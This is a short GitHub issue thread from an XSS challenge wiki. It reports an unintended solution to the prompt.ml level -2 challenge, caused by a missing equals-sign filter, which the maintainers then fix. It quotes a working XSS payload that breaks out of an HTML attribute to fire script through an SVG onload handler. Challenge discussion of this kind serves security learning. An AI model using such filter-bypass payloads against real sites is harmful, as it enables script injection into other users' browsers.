### ISSUE TITLE
prompt.ml Level -2

### ISSUE THREAD

**Issue by 837951602** [cure53/XSSChallengeWiki#12] opened 2018-01-16 04:26 UTC
```"><svg t=#"onload="prompt(1)``` works at least on Firefox

**Comment by 837951602** [comment] 2018-01-16 04:29
like level 7 solution

**Comment by cure53** [comment] 2018-01-16 07:53
What's the context here?

**Comment by ohpe** [comment] 2018-01-20 20:59
True! It also works in webkit .. 
Weird, I don't think it was intended. @filedescriptor? :)

**Comment by tsaniel** [comment] 2018-01-22 13:54
Sorry when I was migrating the old prompt.ml site I accidentally forgot to filter the equal sign `=`. Fixed now and thanks for the issue!

**Comment by tsaniel** [comment] 2018-01-22 13:54
Proof if you will.
https://web.archive.org/web/20150209042954/http://prompt.ml/-2

**Comment by ohpe** [comment] 2018-01-22 13:59
Now makes sense :)

**Comment by filedescriptor** [comment] 2018-01-22 13:59
^ Well accidentally used my old account to reply, but now you know...

**Closed as completed** 2018-01-22 13:59 UTC
